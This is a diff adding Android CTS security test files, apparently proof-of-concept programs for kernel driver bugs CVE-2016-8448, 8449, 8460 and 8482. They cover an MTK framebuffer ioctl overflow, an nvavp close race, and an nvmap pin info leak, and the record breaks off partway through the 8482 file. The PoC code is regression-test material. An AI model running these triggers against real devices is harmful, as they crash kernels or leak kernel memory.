+ /* Output */
+ unsigned int index;
+ int fence_fd;
+};
+
+struct fb_overlay_layer {
+ unsigned int layer_id;
+ unsigned int layer_enable;
+
+ void *src_base_addr;
+ void *src_phy_addr;
+ unsigned int src_direct_link;
+ MTK_FB_FORMAT src_fmt;
+ unsigned int src_use_color_key;
+ unsigned int src_color_key;
+ unsigned int src_pitch;
+ unsigned int src_offset_x, src_offset_y;
+ unsigned int src_width, src_height;
+
+ unsigned int tgt_offset_x, tgt_offset_y;
+ unsigned int tgt_width, tgt_height;
+ MTK_FB_ORIENTATION layer_rotation;
+ MTK_FB_LAYER_TYPE layer_type;
+ MTK_FB_ORIENTATION video_rotation;
+
+ unsigned int isTdshp; /* set to 1, will go through tdshp first, then layer blending, then to color */
+
+ int next_buff_idx;
+ int identity;
+ int connected_type;
+ unsigned int security;
+ unsigned int alpha_enable;
+ unsigned int alpha;
+ int fence_fd; /* 8135 */
+ int ion_fd; /* 8135 CL 2340210 */
+};
+
+struct fb_overlay_config {
+ int fence;
+ int time;
+ struct fb_overlay_layer layers[4];
+};
+
+struct fb_overlay_buffer_info {
+ unsigned int src_vir_addr;
+ unsigned int size;
+};
+
+struct fb_overlay_layer_info {
+ unsigned int layer_id;
+ unsigned int layer_enabled; /* TO BE DEL */
+ unsigned int curr_en;
+ unsigned int next_en;
+ unsigned int hw_en;
+ int curr_idx;
+ int next_idx;
+ int hw_idx;
+ int curr_identity;
+ int next_identity;
+ int hw_identity;
+ int curr_conn_type;
+ int next_conn_type;
+ int hw_conn_type;
+ MTK_FB_ORIENTATION layer_rotation;
+};
+/* -------------------------------------------------------------------------- */
+
+struct fb_post_video_buffer {
+ void *phy_addr;
+ void *vir_addr;
+ MTK_FB_TV_SRC_FORMAT format;
+ unsigned int width, height;
+};
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern unsigned int EnableVSyncLog;
+
+void mtkfb_log_enable(int enable);
+int mtkfb_set_backlight_mode(unsigned int mode);
+int mtkfb_set_backlight_level(unsigned int level);
+int mtkfb_get_debug_state(char *stringbuf, int buf_len);
+unsigned int mtkfb_fm_auto_test(void);
+void mtkfb_clear_lcm(void);
+#endif /* CONFIG_ARCH_MT6735 */
+
+#ifdef __KERNEL__
+
+#include <linux/completion.h>
+#include <linux/interrupt.h>
+#include <linux/workqueue.h>
+#include <linux/version.h>
+#include <../drivers/staging/android/sw_sync.h>
+
+
+#define MTKFB_DRIVER "mtkfb"
+
+enum mtkfb_state {
+ MTKFB_DISABLED = 0,
+ MTKFB_SUSPENDED = 99,
+ MTKFB_ACTIVE = 100
+};
+
+typedef enum {
+ MTKFB_LAYER_ENABLE_DIRTY = (1 << 0),
+ MTKFB_LAYER_FORMAT_DIRTY = (1 << 1),
+ MTKFB_LAYER_SET_DIRTY = (1 << 2),
+} MTKFB_LAYER_CONFIG_DIRTY;
+
+typedef struct {
+ struct work_struct work;
+ struct list_head list;
+ struct fb_overlay_config config;
+ struct sync_fence *fences[4];
+ struct ion_handle *ion_handles[4];
+ void *dev;
+} update_ovls_work_t;
+
+struct mtkfb_device {
+ int state;
+ void *fb_va_base; /* MPU virtual address */
+ dma_addr_t fb_pa_base; /* Bus physical address */
+ unsigned long fb_size_in_byte;
+ void *ovl_va_base; /* MPU virtual address */
+ dma_addr_t ovl_pa_base; /* Bus physical address */
+ unsigned long ovl_size_in_byte;
+
+ unsigned long layer_enable;
+ MTK_FB_FORMAT *layer_format;
+ unsigned int layer_config_dirty;
+
+ int xscale, yscale, mirror; /* transformations.
+ rotate is stored in fb_info->var */
+ u32 pseudo_palette[17];
+
+ struct fb_info *fb_info; /* Linux fbdev framework data */
+ struct device *dev;
+
+ /* Android native fence support */
+ struct workqueue_struct *update_ovls_wq;
+ struct mutex timeline_lock;
+ struct sw_sync_timeline *timeline;
+ int timeline_max;
+ struct list_head pending_configs; /* CL2340210 */
+ struct ion_client *ion_client;
+};
+
+#endif /* __KERNEL__ */
+
+extern long hdmi_handle_cmd(unsigned int cmd, unsigned long arg);
+
+#if defined(CONFIG_ARCH_MT6797)
+extern unsigned int vramsize;
+#endif
+
+#if defined(CONFIG_ARCH_MT6735) || defined(CONFIG_ARCH_MT6735M) || defined(CONFIG_ARCH_MT6753)
+extern bool is_early_suspended;
+extern void mtkfb_waitVsync(void);
+extern bool is_ipoh_bootup;
+
+#ifdef CONFIG_OF
+int _parse_tag_videolfb(void);
+extern unsigned int islcmconnected;
+extern unsigned int vramsize;
+#else
+extern char *saved_command_line;
+#endif
+#endif /* CONFIG_ARCH_MT6735 */
+
+
+#endif /* __MTKFB_H */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
new file mode 100644
index 0000000..61e7cfd
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/mtkfb_info.h
@@ -0,0 +1,101 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __MTKFB_INFO_H__
+#define __MTKFB_INFO_H__
+
+#ifdef __cplusplus
+extern "C" {
+#endif
+
+
+ typedef enum {
+ DISPIF_TYPE_DBI = 0,
+ DISPIF_TYPE_DPI,
+ DISPIF_TYPE_DSI,
+ DISPIF_TYPE_DPI0,
+ DISPIF_TYPE_DPI1,
+ DISPIF_TYPE_DSI0,
+ DISPIF_TYPE_DSI1,
+ HDMI = 7,
+ HDMI_SMARTBOOK,
+ MHL,
+ DISPIF_TYPE_EPD,
+ SLIMPORT
+ } MTKFB_DISPIF_TYPE;
+
+ typedef enum {
+ MTKFB_DISPIF_PRIMARY_LCD = 0,
+ MTKFB_DISPIF_HDMI,
+ MTKFB_DISPIF_EPD,
+ MTKFB_MAX_DISPLAY_COUNT
+ } MTKFB_DISPIF_DEVICE_TYPE;
+
+ typedef enum {
+ DISPIF_FORMAT_RGB565 = 0,
+ DISPIF_FORMAT_RGB666,
+ DISPIF_FORMAT_RGB888
+ } MTKFB_DISPIF_FORMAT;
+
+
+ typedef enum {
+ DISPIF_MODE_VIDEO = 0,
+ DISPIF_MODE_COMMAND
+ } MTKFB_DISPIF_MODE;
+
+ typedef struct mtk_dispif_info {
+ unsigned int display_id;
+ unsigned int isHwVsyncAvailable;
+ MTKFB_DISPIF_TYPE displayType;
+ unsigned int displayWidth;
+ unsigned int displayHeight;
+ unsigned int displayFormat;
+ MTKFB_DISPIF_MODE displayMode;
+ unsigned int vsyncFPS;
+ unsigned int physicalWidth;
+ unsigned int physicalHeight;
+ unsigned int isConnected;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Wdith */
+ unsigned int lcmOriginalWidth;
+/* this value is for DFO Multi-Resolution feature, which stores the original LCM Height */
+ unsigned int lcmOriginalHeight;
+ } mtk_dispif_info_t;
+
+#define MAKE_MTK_FB_FORMAT_ID(id, bpp) (((id) << 8) | (bpp))
+
+ typedef enum {
+ MTK_FB_FORMAT_UNKNOWN = 0,
+
+ MTK_FB_FORMAT_RGB565 = MAKE_MTK_FB_FORMAT_ID(1, 2),
+ MTK_FB_FORMAT_RGB888 = MAKE_MTK_FB_FORMAT_ID(2, 3),
+ MTK_FB_FORMAT_BGR888 = MAKE_MTK_FB_FORMAT_ID(3, 3),
+ MTK_FB_FORMAT_ARGB8888 = MAKE_MTK_FB_FORMAT_ID(4, 4),
+ MTK_FB_FORMAT_ABGR8888 = MAKE_MTK_FB_FORMAT_ID(5, 4),
+ MTK_FB_FORMAT_YUV422 = MAKE_MTK_FB_FORMAT_ID(6, 2),
+ MTK_FB_FORMAT_XRGB8888 = MAKE_MTK_FB_FORMAT_ID(7, 4),
+ MTK_FB_FORMAT_XBGR8888 = MAKE_MTK_FB_FORMAT_ID(8, 4),
+ MTK_FB_FORMAT_UYVY = MAKE_MTK_FB_FORMAT_ID(9, 2),
+ MTK_FB_FORMAT_YUV420_P = MAKE_MTK_FB_FORMAT_ID(10, 2),
+ MTK_FB_FORMAT_YUY2 = MAKE_MTK_FB_FORMAT_ID(11, 2),
+ MTK_FB_FORMAT_BPP_MASK = 0xFF,
+ } MTK_FB_FORMAT;
+
+#define GET_MTK_FB_FORMAT_BPP(f) ((f) & MTK_FB_FORMAT_BPP_MASK)
+
+
+#ifdef __cplusplus
+}
+#endif
+#endif /* __DISP_DRV_H__ */
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
new file mode 100644
index 0000000..e5f675b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8448/poc.c
@@ -0,0 +1,59 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <sys/mman.h>
+#include <fcntl.h>
+//#include <pthread.h>
+#include <sys/prctl.h>
+#include <unistd.h>
+#include <stdbool.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <asm-generic/ioctl.h>
+#include "mtkfb.h"
+int main(int argc, char **argv) {
+ int fd = 0;
+ struct fb_overlay_layer layerInfo;
+ memset(&layerInfo, 0, sizeof(layerInfo));
+ fd = open("/dev/graphics/fb0", O_RDWR);
+ if (fd < 0) {
+ perror("open /dev/graphics/fb0");
+ exit(-1);
+ }
+ printf("Device file opened successfully\n");
+ printf("Trying to get layer info\n");
+ if(ioctl(fd, MTKFB_GET_OVERLAY_LAYER_INFO, &layerInfo) == -1) {
+ perror("ioctl MTKFB_GET_OVERLAY_LAYER_INFO failed");
+ exit(-2);
+ }
+ printf("Got layer info\n");
+ printf("Trying to set layer info\n");
+ // set any huge value here
+ int curr_val = 0xf1111111;
+ while(1) {
+ layerInfo.layer_id = curr_val;
+ if(ioctl(fd, MTKFB_SET_OVERLAY_LAYER, &layerInfo) == -1) {
+ perror("ioctl MTKFB_SET_OVERLAY_LAYER failed");
+ //exit(-2);
+ }
+ curr_val--;
+ if(curr_val == -1) {
+ break;
+ }
+ }
+ printf("Set layer info\n");
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
new file mode 100644
index 0000000..ce1e1bb
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8449
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
new file mode 100755
index 0000000..1e76b55
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8449/poc.c
@@ -0,0 +1,143 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <string.h>
+#include <errno.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%s)\n", ##__VA_ARGS__, errno, strerror(errno))
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+#define CLOSE_THREAD_NUM 100
+#define TRY_TIMES 900
+
+#define DEV "/dev/tegra_avpchannel"
+
+#define NVAVP_IOCTL_MAGIC 'n'
+
+struct nvavp_channel_open_args {
+ __u32 channel_fd;
+};
+
+#define NVAVP_IOCTL_CHANNEL_OPEN _IOR(NVAVP_IOCTL_MAGIC, 0x73, \
+ struct nvavp_channel_open_args)
+
+int fd;
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ ERR("[-] set affinity failed");
+ }
+ return ret;
+}
+
+volatile int target_fd;
+volatile int attack;
+void* close_thread(void* no_use)
+{
+ set_affinity(1);
+
+ while(attack){
+ close(target_fd);
+ }
+
+ return NULL;
+}
+
+int main()
+{
+ int i, try_time = TRY_TIMES, ret;
+ struct nvavp_channel_open_args o_args = { 0 };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ /* open dev */
+ fd = open(DEV, O_RDONLY);
+ if(fd == -1){
+ ERR("[-] open failed");
+ return 0;
+ } else {
+ LOG("[+] open OK");
+ }
+
+ #if 1
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ goto out_dev;
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+
+ target_fd = o_args.channel_fd;
+ #endif
+
+ /* create close thread */
+ #if 1
+ attack = 1;
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ ret = pthread_create(close_thread_id + i, NULL, close_thread, NULL);
+ if(ret){
+ ERR("[-] create close thread %d failed", i);
+ goto out_close_thread;
+ }
+ }
+ #endif
+
+ #if 1
+ for(i = 0; i < TRY_TIMES; i++){
+ LOG("[+] %03d times", i);
+ /* open */
+ ret = ioctl(fd, NVAVP_IOCTL_CHANNEL_OPEN, &o_args);
+ if(ret == -1) {
+ ERR("[-] ioctl failed");
+ } else {
+ LOG("[+] ioctl OK, fd = %d", o_args.channel_fd);
+ }
+ //usleep(200);
+ }
+ #endif
+
+out_close_thread:
+ attack = 0;
+ /* kill close thread */
+ for(i = 0; i < CLOSE_THREAD_NUM; i++){
+ if(close_thread_id[i])
+ pthread_join(close_thread_id[i], NULL);
+ }
+out_dev:
+ close(fd);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
new file mode 100644
index 0000000..b9c51d1
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8460
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS := -Wall -W -g -O2 -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
new file mode 100755
index 0000000..78d41e5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8460/poc.c
@@ -0,0 +1,165 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <unistd.h>
+#include <errno.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_pin_handle {
+ __u32 *handles; /* array of handles to pin/unpin */
+ unsigned long *addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_pin_handle_32 {
+ __u32 handles; /* array of handles to pin/unpin */
+ __u32 addr; /* array of addresses to return */
+ __u32 count; /* number of entries in handles */
+};
+
+struct nvmap_map_caller_32 {
+ __u32 handle; /* nvmap handle */
+ __u32 offset; /* offset into hmem; should be page-aligned */
+ __u32 length; /* number of bytes to map */
+ __u32 flags; /* maps as wb/iwb etc. */
+ __u32 addr; /* user pointer*/
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PIN_MULT _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_PIN_MULT_32 _IOWR(NVMAP_IOC_MAGIC, 10, struct nvmap_pin_handle_32)
+#define NVMAP_IOC_MMAP_32 _IOWR(NVMAP_IOC_MAGIC, 5, struct nvmap_map_caller_32)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+
+int g_fd = -1;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ return g_fd;
+}
+
+
+int main(int argc, char**argv) {
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ int i;
+ int* handles = mmap((void*)0x20000000, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(handles, 0x42, 0x1000);
+ for (i = 0; i < 2; ++i) {
+ struct nvmap_create_handle op = {0};
+ op.size = 0x1000;
+ ioctl(g_fd, NVMAP_IOC_CREATE, &op);
+ handles[i] = op.handle;
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.handle = op.handle;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+ }
+
+ void* leak_addr = (void*) 0x10001000;
+ void* mmap_addr = mmap(leak_addr, 0x1000, PROT_READ | PROT_WRITE , MAP_FIXED | MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+ memset(leak_addr, 0x41, 0x1000);
+
+ unsigned long leaked_data = 0;
+ struct nvmap_pin_handle_32 pin = {0};
+ pin.count = 2;
+ pin.handles = (unsigned int) handles;
+ struct nvmap_pin_handle err_pin = {0};
+ err_pin.count = 0;
+ err_pin.handles = handles;
+ err_pin.addr = leak_addr + 8;
+
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT, &err_pin); // construct op.addr
+ ioctl(g_fd, NVMAP_IOC_PIN_MULT_32, &pin);
+
+ for (i = 0; i < 10; ++i) {
+ if(((int*)leak_addr)[i] != 0x41414141 && 0 == leaked_data) {
+ leaked_data = (unsigned long)((int*)leak_addr) + i;
+ }
+ }
+
+ if (leaked_data) {
+ printf("Vulnerable");
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
new file mode 100644
index 0000000..b41fb16
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8482
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
new file mode 100644
index 0000000..41862a5
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8482/poc.c
@@ -0,0 +1,205 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+#define NVHOST_IOCTL_MAGIC 'H'
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ if(ret == -1){
+ printf("[-] set affinity failed: [%d]-%d\n", errno, errno);
+ }
+ return ret;
+}
+
+struct nvhost_submit_args {
+ __u32 submit_version;
+ __u32 num_syncpt_incrs;
+ __u32 num_cmdbufs;
+ __u32 num_relocs;
+ __u32 num_waitchks;
+ __u32 timeout;
+ __u32 flags;
+ __u32 fence; /* Return value */
+ __u64 syncpt_incrs;
+ __u64 cmdbuf_exts;
+
+ __u64 pad[3]; /* future expansion */
+
+ __u64 cmdbufs;
+ __u64 relocs;
+ __u64 reloc_shifts;
+ __u64 waitchks;
+ __u64 waitbases;
+ __u64 class_ids;
+ __u64 fences;
+};
